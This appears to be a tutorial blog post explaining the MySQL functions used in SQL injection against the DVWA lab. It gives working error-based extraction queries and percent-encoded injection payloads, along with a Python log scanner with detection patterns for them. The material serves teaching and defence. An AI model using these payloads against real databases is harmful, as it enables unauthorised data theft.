SQL injection: Understanding mysql command
A SQL injection attack consists of insertion or “injection” of a SQL query via the input data from the client to the application. A successful SQL injection exploit can read sensitive data from the database, modify database data (Insert/Update/Delete), execute administration operations on the database (such as shutdown the DBMS), recover the content of a given file present on the DBMS file system and in some cases issue commands to the operating system. SQL injection attacks are a type of injection attack, in which SQL commands are injected into data-plane input in order to effect the execution of predefined SQL commands. (OWASP)
In this post, I'm going to introduce the SQL commands used in SQLi attacks. Let's go!
The examples use the following table (the users table from DVWA):
+---------+------------+-----------+---------+----------------------------------+----------------------------------------------------+---------------------+--------------+
| user_id | first_name | last_name | user    | password                         | avatar                                             | last_login          | failed_login |
+---------+------------+-----------+---------+----------------------------------+----------------------------------------------------+---------------------+--------------+
| 1       | admin      | admin     | admin   | 5f4dcc3b5aa765d61d8327deb882cf99 | http://192.168.1.5/DVWA/hackable/users/admin.jpg   | 2017-09-01 11:40:16 | 0            |
| 2       | Gordon     | Brown     | gordonb | e99a18c428cb38d5f260853678922e03 | http://192.168.1.5/DVWA/hackable/users/gordonb.jpg | 2017-09-01 11:40:16 | 0            |
| 3       | Hack       | Me        | 1337    | 8d3533d75ae2c3966d7e0d4fcc69216b | http://192.168.1.5/DVWA/hackable/users/1337.jpg    | 2017-09-01 11:40:16 | 0            |
| 4       | Pablo      | Picasso   | pablo   | 0d107d09f5bbe40cade3de5c71e9e9b7 | http://192.168.1.5/DVWA/hackable/users/pablo.jpg   | 2017-09-01 11:40:16 | 0            |
| 5       | Bob        | Smith     | smithy  | 5f4dcc3b5aa765d61d8327deb882cf99 | http://192.168.1.5/DVWA/hackable/users/smithy.jpg  | 2017-09-01 11:40:16 | 0            |
+---------+------------+-----------+---------+----------------------------------+----------------------------------------------------+---------------------+--------------+
The MID() Function
The MID() function is used to extract characters from a text field.
SQL MID() Syntax
SELECT MID(column_name,start,length) AS some_name FROM table_name;
The LIMIT Clause
The SQL SELECT ... LIMIT statement is used to retrieve records from one or more tables in a database and limit the number of records returned based on a limit value.
SQL LIMIT syntax
SELECT expressions
FROM tables
[WHERE conditions]
[ORDER BY expression [ ASC | DESC ]]
LIMIT number_rows [ OFFSET offset_value ];
MySQL also accepts the short form LIMIT offset, number_rows, which is the form used in the examples below.
- Using LIMIT to get the first table name in the current database:
select table_name from information_schema.tables where table_schema=database() limit 0,1;
- Using SUBSTR() on that result to get the first character of the table name:
select substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1) m;
MySQL CONCAT() Function
The CONCAT() function concatenates two or more expressions together.
MySQL concat() Syntax
CONCAT(expression1, expression2, expression3,…)
MySQL CONCAT_WS() Function
The CONCAT_WS() function concatenates two or more expressions together and adds a separator between them.
MySQL CONCAT_WS() syntax
CONCAT_WS(separator, expression1, expression2, expression3,…)
MySQL GROUP_CONCAT() Function
The MySQL GROUP_CONCAT() function concatenates strings from a group into a single string with various options.
MySQL GROUP_CONCAT() syntax
GROUP_CONCAT([DISTINCT] expression [ORDER BY expression] [SEPARATOR sep])
MySQL COUNT() Function
The COUNT() function returns the number of records in a select query.
MySQL COUNT() syntax
COUNT(expression)
MySQL RAND() Function
The RAND() function returns a random floating-point value between 0 (inclusive) and 1 (exclusive); scaling it (for example with FLOOR(RAND()*n)) gives a random number within a range.
The RAND() function will return a fresh random sequence if no seed is provided, and a repeatable sequence of random numbers if a seed value is used.
MySQL RAND() syntax
RAND([seed])
MySQL FLOOR() Function
The FLOOR() function returns the largest integer value that is less than or equal to a number.
MySQL FLOOR() syntax
FLOOR(number)
- Using FLOOR(RAND()*2) with COUNT(*) and GROUP BY to get the database name:
select count(*),(concat(0x3a,database(),0x3a,floor(rand()*2))) first_name from information_schema.tables group by first_name;
- Using the same pattern to get a table name:
select count(*),concat(0x3a,0x3a,(select table_name from information_schema.tables where table_schema=database() limit 1,1),0x3a,floor(rand()*2)) name from information_schema.tables group by name;
- Using the same pattern to get table content:
select count(*),concat(0x3a,0x3a,(select first_name from users limit 1,1),0x3a,floor(rand()*2)) name from information_schema.tables group by name;
Why this works: floor(rand()*2) can evaluate to a different value between the moment GROUP BY looks a key up and the moment it inserts it, so MySQL raises a duplicate-entry error, and that error message carries the concatenated string (database name, table name or column value) between the 0x3a colon markers. An application that echoes raw database errors to the client therefore leaks data; the mitigation is to return generic error pages and to use parameterized queries so user input never becomes part of the SQL text.
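From the defender's side, the queries walked through above leave distinctive traces in web server access logs, and that is where a practitioner would look for them. The Python scanner below is an added example, not code from the original post: it percent-decodes each request target and flags the function combinations this page introduces (SUBSTR/MID, information_schema with LIMIT, FLOOR(RAND()) with GROUP BY, CONCAT with 0x hex markers). The log lines, paths and rule names are constructed for illustration.

```python
import re
from typing import List, Tuple
from urllib.parse import unquote_plus

# Constructed sample access-log lines (not taken from the original post). The
# request targets reuse the functions introduced above, percent-encoded the
# way a browser sends them; line 3 returns a 500, as error-based probes do.
SAMPLE_LOG = """\
10.0.0.7 - - [01/Sep/2017:11:40:16 +0000] "GET /dvwa/vulnerabilities/sqli/?id=1&Submit=Submit HTTP/1.1" 200 512
10.0.0.7 - - [01/Sep/2017:11:41:02 +0000] "GET /dvwa/vulnerabilities/sqli/?id=1%27%20and%20substr((select%20table_name%20from%20information_schema.tables%20where%20table_schema=database()%20limit%200,1),1,1)=%27u HTTP/1.1" 200 512
10.0.0.7 - - [01/Sep/2017:11:41:30 +0000] "GET /dvwa/vulnerabilities/sqli/?id=1%27%20and%20(select%20count(*),concat(0x3a,database(),0x3a,floor(rand()*2))x%20from%20information_schema.tables%20group%20by%20x)--%20- HTTP/1.1" 500 233
10.0.0.9 - - [01/Sep/2017:11:42:00 +0000] "GET /search?q=group+concert+tickets HTTP/1.1" 200 1024
"""

# Rules match the combinations the post walks through on the decoded,
# lower-cased request target, so plain words like "group concert" do not fire.
RULES = [
    ("substring-extraction", re.compile(r"\b(substr|substring|mid)\s*\(")),
    ("schema-enumeration", re.compile(r"information_schema\.\w+.*\blimit\s+\d+\s*,\s*\d+")),
    ("error-based-floor-rand", re.compile(r"floor\s*\(\s*rand\s*\(.*\bgroup\s+by\b")),
    ("concat-with-hex-marker", re.compile(r"(concat|concat_ws|group_concat)\s*\(\s*0x[0-9a-f]+")),
]
REQUEST_RE = re.compile(r'"(?:GET|POST)\s+(\S+)')

def normalize(request_target: str) -> str:
    """Percent-decode twice (catches double encoding) and fold case."""
    return unquote_plus(unquote_plus(request_target)).lower()

def scan_line(line: str) -> List[str]:
    """Return the names of every rule that matches one access-log line."""
    m = REQUEST_RE.search(line)
    if not m:
        return []
    target = normalize(m.group(1))
    return [name for name, rx in RULES if rx.search(target)]

def scan_log(text: str) -> List[Tuple[int, List[str]]]:
    """Return (line number, matched rule names) for every flagged line."""
    hits = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        names = scan_line(line)
        if names:
            hits.append((lineno, names))
    return hits

if __name__ == "__main__":
    for lineno, names in scan_log(SAMPLE_LOG):
        print(f"line {lineno}: {', '.join(names)}")
```

Pair the rule hits with the response status: a burst of flagged requests from one client that end in 500s is the signature of error-based extraction, while the same rules with 200s point at a blind or union-based variant.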
SQL GROUP BY Statement
The GROUP BY statement is often used with aggregate functions (COUNT, MAX, MIN, SUM, AVG) to group the result-set by one or more columns.
SQL GROUP BY syntax
SELECT column_name(s)
FROM table_name
WHERE condition
GROUP BY column_name(s)
ORDER BY column_name(s);
MySQL SUBSTR() Function
The SUBSTR() function extracts a substring from a string (starting at any position).
MySQL substr() syntax
SUBSTR(string, start, length)
or
SUBSTR(string FROM start FOR length)